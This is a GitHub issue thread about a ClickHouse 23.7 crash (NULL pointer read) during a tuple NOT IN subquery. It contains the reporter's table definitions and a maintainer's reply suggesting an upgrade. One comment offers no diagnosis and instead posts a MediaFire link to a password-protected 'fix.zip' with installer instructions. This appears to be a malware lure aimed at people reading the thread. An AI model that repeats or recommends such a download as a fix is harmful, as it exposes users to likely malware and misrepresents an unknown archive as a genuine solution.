### ISSUE TITLE
<Fatal> BaseDaemon: Address: NULL pointer. Access: read. Unknown si_code.

### ISSUE THREAD

**Issue by AVeryHandsomePerson** [ClickHouse/ClickHouse#68877]
### Question

create table a
(
    _id               String,
    shopId            String,
    batch             String
)
    engine = MergeTree PARTITION BY batch
        ORDER BY shopId
        SETTINGS index_granularity = 8192;

create table b
(
    _id               String,
    shopId            String,
    batch             String
)
    engine = MergeTree PARTITION BY batch
        ORDER BY shopId
        SETTINGS index_granularity = 8192;
 version 23.7.4.5 (official build).
In the query, the primary key `shopId` in table `b` contains empty values (`''`). When executing `SELECT * FROM a WHERE (batch, shopId) NOT IN (SELECT DISTINCT batch, shopId FROM b lml)`, the following error occurs. What is the reason for this?
![image](https://github.com/user-attachments/assets/d6159a64-834b-432a-b537-87f6ac39283b)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AVeryHandsomePerson** [comment]
What is the cause of this issue? @Qsgz2023ji5ban

**Comment by Algunenano** [comment]
Seems similar to https://github.com/ClickHouse/ClickHouse/issues/52540. Please upgrade to a supported release and retest. In case of failure share a reproducer if possible
